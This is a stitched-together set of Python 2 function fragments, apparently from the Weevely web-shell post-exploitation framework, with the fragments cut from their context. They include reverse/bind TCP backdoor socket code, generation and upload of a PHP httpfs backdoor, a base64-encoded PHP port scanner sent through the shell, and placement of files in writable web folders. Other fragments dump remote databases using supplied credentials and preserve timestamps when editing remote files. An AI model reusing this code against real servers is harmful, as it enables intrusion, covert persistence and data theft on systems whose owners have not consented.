def _probe(self): if not self.support_vectors.get('exists').execute({ 'rpath' : self.args['remote_mount'] }): raise ProbeException(self.name, '%s \'%s\'' % (WARN_HTTPFS_MOUNTPOINT, self.args['remote_mount'])) self.args['remote_mount'] = self.support_vectors.get('normalize').execute({ 'path' : self.args['remote_mount'] }) if self.args['umount_all']: # Umount all httpfs partitions self.__umount_all() raise ProbeSucceed(self.name, 'Unmounted partitions') if not self.args['just_mount']: # Upload remote try: Upload2web._probe(self) except ProbeSucceed: pass if not self.args['just_install']: if not self.args['local_mount']: self.args['local_mount'] = mkdtemp() cmd = '%s mount %s %s %s' % (self.args['httpfs_path'], self.args['url'], self.args['local_mount'], self.args['remote_mount']) status, output = getstatusoutput(cmd) if status == 0: if output: raise ProbeException(self.name,'%s\nCOMMAND:\n$ %s\nOUTPUT:\n> %s\n%s' % (WARN_HTTPFS_OUTP, cmd, output.replace('\n', '\n> '), WARN_HTTPFS_CHECK)) else: raise ProbeException(self.name,'%s\nCOMMAND:\n$ %s\nOUTPUT:\n> %s\n%s' % (WARN_HTTPFS_RUN, cmd, output.replace('\n', '\n> '), WARN_HTTPFS_CHECK))
def _prepare(self): self._result = {} if self.args['pathfile']: try: filelist = open(os.path.expanduser(self.args['pathfile']), 'r').read().splitlines() except: raise ProbeException( self.name, "Error opening path list \'%s\'" % self.args['pathfile']) elif self.args['pathlist']: filelist = self.args['pathlist'] elif self.args['auto_home']: filelist = self.common_files['home'] elif self.args['auto_web']: filelist = self.common_files['web'] else: filelist = self.common_files['web'] + self.common_files['home'] result = self.support_vectors.get('users').execute() if not result: raise ProbeException(self.name, 'Cant extract system users') self.args['paths'] = [] for u in result: for f in filelist: self.args['paths'].append('/' + join_abs_paths([result[u].home, f]))
def _probe(self): self._result = False rpathfolder, rfilename = path.split(self.args['rpath']) lpath = path.join(mkdtemp(), rfilename) lpath_orig = lpath + '.orig' rpath_existant = self.support_vectors.get( 'exists').execute({'rpath': self.args['rpath']}) if rpath_existant: if not self.support_vectors.get('download').execute({'rpath': self.args['rpath'], 'lpath': lpath}): raise ProbeException( self.name, '%s \'%s\'' % (WARN_DOWNLOAD_FAILED, self.args['rpath'])) if self.args['keep_ts']: self.args['epoch'] = self.support_vectors.get( 'get_time').execute({'rpath': self.args['rpath']}) try: copy(lpath, lpath_orig) except Exception, e: raise ProbeException( self.name, '\'%s\' %s %s' % (lpath_orig, WARN_BACKUP_FAILED, str(e))) call("%s %s" % (self.args['editor'], lpath), shell=True) md5_lpath_orig = md5sum(lpath_orig) if md5sum(lpath) == md5_lpath_orig: self._result = True raise ProbeSucceed( self.name, "File unmodified, no upload needed")
def __do_request(self, listcmd, mode): cmd = listcmd if isinstance(listcmd, types.ListType): cmd = ' '.join(listcmd) request = CmdRequest(self.modhandler.url, self.modhandler.password, self.args['proxy']) request.setPayload(cmd, mode) msg_class = self.args['debug'] if self.args['post']: request.setPostData(self.args['post']) self.mprint("Post data values:", msg_class) for field in self.args['post']: self.mprint( " %s (%i)" % (field, len(self.args['post'][field])), msg_class) self.mprint("Request: %s" % (cmd), msg_class) try: response = request.execute() except NoDataException, e: raise ProbeException(self.name, WARN_NO_RESPONSE)
def _prepare(self): services_path = self._get_service_path() try: services = open(services_path, 'r').read() except Exception, e: raise ProbeException(self.name, '\'%s\' %s' % (services_path, WARN_NO_SUCH_FILE))
def _probe(self): self._result = {} enum_pathlist = str([ x + 'ifconfig' for x in [ '/sbin/', '/bin/', '/usr/bin/', '/usr/sbin/', '/usr/local/bin/', '/usr/local/sbin/' ] ]) ifconfig_pathlist = self.support_vectors.get('enum').execute( {'pathlist': enum_pathlist}) for path in ifconfig_pathlist: if ifconfig_pathlist[path] != ['', '', '', '']: result = self.support_vectors.get('ifconfig').execute( {'ifconfig_path': path}) if result: ifaces = re.findall( r'^(\S+).*?inet addr:(\S+).*?Mask:(\S+)', result, re.S | re.M) if ifaces: for iface in ifaces: ipnet = IPNetwork('%s/%s' % (iface[1], iface[2])) self._result[iface[0]] = ipnet else: raise ProbeException(self.name, '\'%s\' %s' % (path, WARN_NO_OUTPUT))
def __init__(self, support_vectors, url): self.support_vectors = support_vectors self.name = 'webenv' script_folder = self.support_vectors.get('script_folder').execute() script_url_splitted = urlsplit(url) script_url_path_folder, script_url_path_filename = os.path.split( script_url_splitted.path) url_folder_pieces = script_url_path_folder.split(os.sep) folder_pieces = script_folder.split(os.sep) for pieceurl, piecefolder in zip(reversed(url_folder_pieces), reversed(folder_pieces)): if pieceurl == piecefolder: folder_pieces.pop() url_folder_pieces.pop() else: break base_url_path_folder = os.sep.join(url_folder_pieces) self.base_folder_url = urlunsplit(script_url_splitted[:2] + (base_url_path_folder, ) + script_url_splitted[3:]) self.base_folder_path = os.sep.join(folder_pieces) if not self.base_folder_url or not self.base_folder_path: raise ProbeException(self.name, WARN_WEBROOT_INFO)
class Mapwebfiles(Module): '''Crawl and enumerate web folders files permissions''' def _set_vectors(self): self.support_vectors.add_vector('enum', 'file.enum', ["asd", "-pathlist", "$pathlist"]) def _set_args(self): self.argparser.add_argument('url', help='HTTP URL where start crawling (es. http://host/path/page.html)') self.argparser.add_argument('baseurl', help='HTTP base url (es. http://host/path/)') self.argparser.add_argument('rpath', help='Remote web root corresponding to crawled path (es. /var/www/path)') self.argparser.add_argument('-depth', help='Crawl depth', type=int, default=3) def _prepare(self): if not url_validator.match(self.args['url']): raise ProbeException(self.name, '\'%s\': %s' % (self.args['url'], WARN_NOT_URL) ) if not url_validator.match(self.args['baseurl']): raise ProbeException(self.name, '\'%s\': %s' % (self.args['baseurl'], WARN_NOT_URL) ) url = self.args['url'] baseurl = self.args['baseurl'] rpath = self.args['rpath'] urls = [] try: crawler = Crawler(url, self.args['depth'], '', '') crawler.crawl() except ModuleException, e: raise except Exception, e: raise ProbeException(self.name, "%s: %s" % (ERR_CRAWLER_EXCEPT, str(e)))
def connect_socket(self): if (self.connect): self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.connect((self.hostname, self.port)) else: server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) try: server.setsockopt(socket.SOL_SOCKET, socket.TCP_NODELAY, 1) except socket.error: #print("Warning: unable to set TCP_NODELAY...") pass try: server.bind(('localhost', self.port)) except socket.error, e: raise ProbeException('backdoor.reversetcp', '%s %s' % (WARN_BINDING_SOCKET, str(e))) server.listen(1) server.settimeout(3) try: self.socket, address = server.accept() except socket.timeout, e: server.close() raise ExecutionException('backdoor.reversetcp', 'timeout')
def __generate_httpfs(self): status, php_bd_content = getstatusoutput('%s generate php' % (self.args['httpfs_path'])) if status != 0 or not php_bd_content: raise ProbeException(self.name, '\'%s\' %s' % (self.args['httpfs_path'], WARN_ERR_GEN_PHP)) self.args['lpath'] = randstr(4) + '.php' self.args['content'] = php_bd_content
def _prepare(self): if not url_validator.match(self.args['url']): raise ProbeException(self.name, '\'%s\': %s' % (self.args['url'], WARN_NOT_URL) ) if not url_validator.match(self.args['baseurl']): raise ProbeException(self.name, '\'%s\': %s' % (self.args['baseurl'], WARN_NOT_URL) ) url = self.args['url'] baseurl = self.args['baseurl'] rpath = self.args['rpath'] urls = [] try: crawler = Crawler(url, self.args['depth'], '', '') crawler.crawl() except ModuleException, e: raise
def __umount_all(self): status, output = getstatusoutput('mount') if status != 0 or not output: raise ProbeException(self.name, '%s: %s' % (WARN_FUSE_UMOUNT, output)) local_mountpoints = re.findall('(/[\S]+).+httpfs',output) if not local_mountpoints: raise ProbeException(self.name, WARN_MOUNT_NOT_FOUND) for mountpoint in local_mountpoints: cmd = 'fusermount -u %s' % (mountpoint) status, output = getstatusoutput(cmd) if status != 0: raise ProbeException(self.name, '%s: %s' % (WARN_FUSE_UMOUNT, output)) self.mprint('Umounted: \'%s\'' % '\', '.join(local_mountpoints))
def __get_epoch_ts(self, rpath): ref_epoch = 0 if self.support_vectors.get('exists').execute({ 'rpath' : rpath }): ref_epoch = self.support_vectors.get('get_epoch').execute({ 'rpath' : rpath }) if not ref_epoch: raise ProbeException(self.name, 'can\'t get timestamp from \'%s\'' % ref_epoch) return ref_epoch
class Scan(Module): '''Port scan open TCP ports''' def _set_vectors(self): self.support_vectors.add_vector('ifaces', 'net.ifaces', []) self.support_vectors.add_vector('scan', 'shell.php', [ """$str = base64_decode($_POST["$post_field"]); foreach (explode(',', $str) as $s) { $s2 = explode(' ', $s); foreach( explode('|', $s2[1]) as $p) { if($fp = fsockopen("$s2[0]", $p, $n, $e, $timeout=1)) {print(" $s2[0]:$p"); fclose($fp);} }print(".");}""", "-post", "{\'$post_field\' : \'$data\' }" ]) def _set_args(self): self.argparser.add_argument( 'addr', help= 'Single IP, multiple: IP1,IP2,.., networks IP/MASK or firstIP-lastIP, interfaces (ethN)' ) self.argparser.add_argument( 'port', help='Single post, multiple: PORT1,PORT2,.. or firstPORT-lastPORT') self.argparser.add_argument('-unknown', help='Scan also unknown ports', action='store_true') self.argparser.add_argument('-ppr', help=SUPPRESS, default=10, type=int) def _get_service_path(self): return os.path.join(self.modhandler.path_modules, 'net', 'external', 'nmap-services-tcp.txt') def _prepare(self): services_path = self._get_service_path() try: services = open(services_path, 'r').read() except Exception, e: raise ProbeException( self.name, '\'%s\' %s' % (services_path, WARN_NO_SUCH_FILE)) ifaces_all = self.support_vectors.get('ifaces').execute() reqlist = RequestList(self.modhandler, services, ifaces_all) reqlist.add(self.args['addr'], self.args['port']) if not reqlist: raise ProbeException(self.name, WARN_INVALID_SCAN) if self.args['ppr'] == 10 and self.args['addr'] == '127.0.0.1': self.args['ppr'] = 100 self.args['reqs'] = reqlist
def _prepare(self): self._result = {} if not self.args['pathlist']: try: self.args['pathlist'] = open( os.path.expanduser(self.args['pathfile']), 'r').read().splitlines() except: raise ProbeException( self.name, "Error opening path list \'%s\'" % self.args['pathfile'])
def _prepare(self): if not self.args['just_run']: Phpproxy._prepare(self) else: if not url_validator.match(self.args['just_run']): raise ProbeException( self.name, '\'%s\': %s' % (self.args['just_run'], WARN_NOT_URL)) self.args['url'] = self.args['just_run'] self.args['rpath'] = ''
def _check_remote_file(self): if self.support_vectors.get('check_exists').execute( {'rpath': self.args['rpath']}): if not self.args['force']: raise ProbeException( self.name, '%s. Overwrite \'%s\' using -force option.' % (WARN_FILE_EXISTS, self.args['rpath'])) else: self.support_vectors.get('clear').execute( {'rpath': self.args['rpath']})
def _check_credentials(self): get_current_user = '******' if self.args['vector']== 'postgres' else 'SELECT USER();' user = self.support_vectors.get(self.args['dbms']).execute({ 'host' : self.args['host'], 'user' : self.args['user'], 'pass' : self.args['pass'], 'query' : get_current_user }) if user: user = user[:-1] self.stored_args_namespace['vector'] = self.args['vector'] self.stored_args_namespace['prompt'] = '%s SQL> ' % user else: raise ProbeException(self.name, "%s of %s " % (WARN_CHECK_CRED, self.args['host']) )
def _load_local_file(self): if not self.args['content']: try: local_file = open(self.args['lpath'], 'r') except Exception, e: raise ProbeException( self.name, '\'%s\' %s' % (self.args['lpath'], WARN_NO_SUCH_FILE)) self.args['content'] = local_file.read() local_file.close()
def folder_map(self, relative_path_folder='.'): absolute_path = self.support_vectors.get('normalize').execute( {'path': relative_path_folder}) if not absolute_path: raise ProbeException( self.name, '\'%s\' %s' % (relative_path_folder, WARN_NOT_FOUND)) if not absolute_path.startswith(self.base_folder_path.rstrip('/')): raise ProbeException( self.name, '\'%s\' not in \'%s\': %s' % (absolute_path, self.base_folder_path.rstrip('/'), WARN_NOT_WEBROOT_SUBFOLDER)) relative_to_webroot_path = absolute_path.replace( self.base_folder_path, '') url_folder = '%s/%s' % (self.base_folder_url.rstrip('/'), relative_to_webroot_path.lstrip('/')) return absolute_path, url_folder
def _stringify_result(self): if self._result: if not '-- Dumping data for table' in self._result: self.mprint(WARN_DUMP_INCOMPLETE) if not self.args['ldump']: temporary_folder = mkdtemp(prefix='weev_') self.args['ldump'] = path.join( temporary_folder, '%s:%s@%s-%s.txt' % (self.args['user'], self.args['pass'], self.args['host'], self.args['db'])) try: lfile = open(self.args['ldump'], 'w').write(self._result) except: raise ProbeException( self.name, "\'%s\' %s" % (self.args['ldump'], WARN_DUMP_ERR_SAVING)) else: self.mprint("\'%s\' %s" % (self.args['ldump'], WARN_DUMP_SAVED)) else: raise ProbeException(self.name, WARN_NO_DUMP)
def _probe(self): value = self.support_vectors.get(self.args['attr']).execute(self.args) if self.args['attr'] == 'md5' and value: self._result = value elif self.args['attr'] in ('size', 'time_epoch', 'time'): try: self._result = int(value) except ValueError, e: raise ProbeException(self.name, "%s: '%s'" % (WARN_INVALID_VALUE, value)) if self.args['attr'] == 'time': self._result = datetime.datetime.fromtimestamp( self._result).strftime('%Y-%m-%d %H:%M:%S')
def _prepare(self): proxy_path = self._get_proxy_path() if not self.args['rpath']: # If no rpath, set content and remote final filename as random try: content = open(proxy_path, 'r').read() except Exception, e: raise ProbeException( self.name, '\'%s\' %s' % (self.args['lpath'], WARN_NO_SUCH_FILE)) self.args['lpath'] = randstr(4) + '.php' self.args['content'] = content
def _prepare(self): # Check chunk size if (self.args['hostname'] not in ('127.0.0.1', 'localhost')) and self.args['chunksize'] > 20: self.mprint('Chunk size %i: %s' % (self.args['chunksize'], WARN_CHUNKSIZE_TOO_BIG)) # Load wordlist wordlist = self.args['wordlist'] if not wordlist: if self.args['wordfile']: try: local_file = open(self.args['wordfile'], 'r') except Exception, e: raise ProbeException( self.name, '\'%s\' %s' % (self.args['wordfile'], WARN_NO_SUCH_FILE)) else: wordlist = local_file.read().split('\n')
def _verify(self): if not self._result: raise ProbeException(self.name, WARN_NO_IFACES)
def _verify(self): raise ProbeException(self.name, WARN_DELETE_FAIL)
def _prepare(self): self._result = False self.modhandler.load('file.check').run([self.args['rpath'], 'exists']) if not self.modhandler.load('file.check')._result: raise ProbeException(self.name, WARN_NO_SUCH_FILE)
def _verify(self): if not self.support_vectors.get('check_exists').execute( {'rpath': self.args['rpath']}): raise ProbeException( self.name, '\'%s\' %s' % (self.args['rpath'], WARN_UPLOAD_FAIL))
class Upload2web(Upload): '''Upload binary/ascii file into remote web folders and guess corresponding url''' def _set_args(self): self.argparser.add_argument('lpath') self.argparser.add_argument('rpath', help='Optional, upload as rpath', nargs='?') self.argparser.add_argument( '-startpath', help='Upload in first writable subdirectory', metavar='STARTPATH', default='.') self.argparser.add_argument('-chunksize', type=int, default=1024) self.argparser.add_argument('-content', help=SUPPRESS) self.argparser.add_argument('-vector', choices=self.vectors.keys()) self.argparser.add_argument('-force', action='store_true') def _set_vectors(self): Upload._set_vectors(self) self.support_vectors.add_vector('find_writable_dirs', 'find.perms', '-type d -writable $path'.split(' ')) self.support_vectors.add_vector('document_root', 'system.info', 'document_root') self.support_vectors.add_vector('normalize', 'shell.php', 'print(realpath("$path"));') self.support_vectors.add_vector('script_folder', 'shell.php', 'print(dirname(__FILE__));') def _prepare(self): Upload._load_local_file(self) webenv = WebEnv(self.support_vectors, self.modhandler.url) if self.args['rpath']: # Check if remote file is actually in web root self.args['rpath'], self.args['url'] = webenv.file_map( self.args['rpath']) else: # Extract filename filename = self.args['lpath'].split('/')[-1] # Check if starting folder is actually in web root try: absolute_path_folder, url_folder = webenv.folder_map( self.args['startpath']) except ProbeException, e: # If default research fails, retry from web root base folder if self.args['startpath'] != '.': raise else: try: absolute_path_folder, url_folder = webenv.folder_map( webenv.base_folder_path) except ProbeException, e2: raise e # Start find in selected folder writable_subdirs = self.support_vectors.get( 'find_writable_dirs').execute({'path': absolute_path_folder}) if not writable_subdirs: raise ProbeException(self.name, WARN_WRITABLE_DIR_NOT_FOUND) writable_folder, writable_folder_url = webenv.folder_map( writable_subdirs[0]) self.args['rpath'] = os.path.join(writable_folder, filename) self.args['url'] = os.path.join(writable_folder_url, filename)
def _verify(self): if not self._result: raise ProbeException( self.name, "Unable to change timestamp, check permission")